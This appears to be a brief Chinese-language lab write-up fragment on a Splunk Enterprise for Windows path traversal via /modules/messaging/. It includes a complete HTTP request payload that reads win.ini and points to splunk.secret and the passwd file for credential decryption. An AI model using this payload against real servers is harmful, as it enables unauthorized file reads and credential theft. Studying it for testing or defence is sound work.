/modules/messaging/
端点执行路径遍历。此漏洞仅影响 Windows 版 Splunk Enterprise。os.path.join
函数会从路径令牌中删除驱动器号payload
GET /zh-CN/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../windows/win.ini HTTP/1.1
Host: 10.10.11.61:8000
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Accept: */*
Referer: http://10.10.11.61:8000/
etc/auth/splunk.secret
用于解密Splunk 配置文件存储在 Splunk 安装目录下的 etc
目录中,在 Windows 上通常为 C:\Program Files\Splunk\etc
,其web密码文件passwd
也是存储在此目录下
解密参考:Splunk利用姿势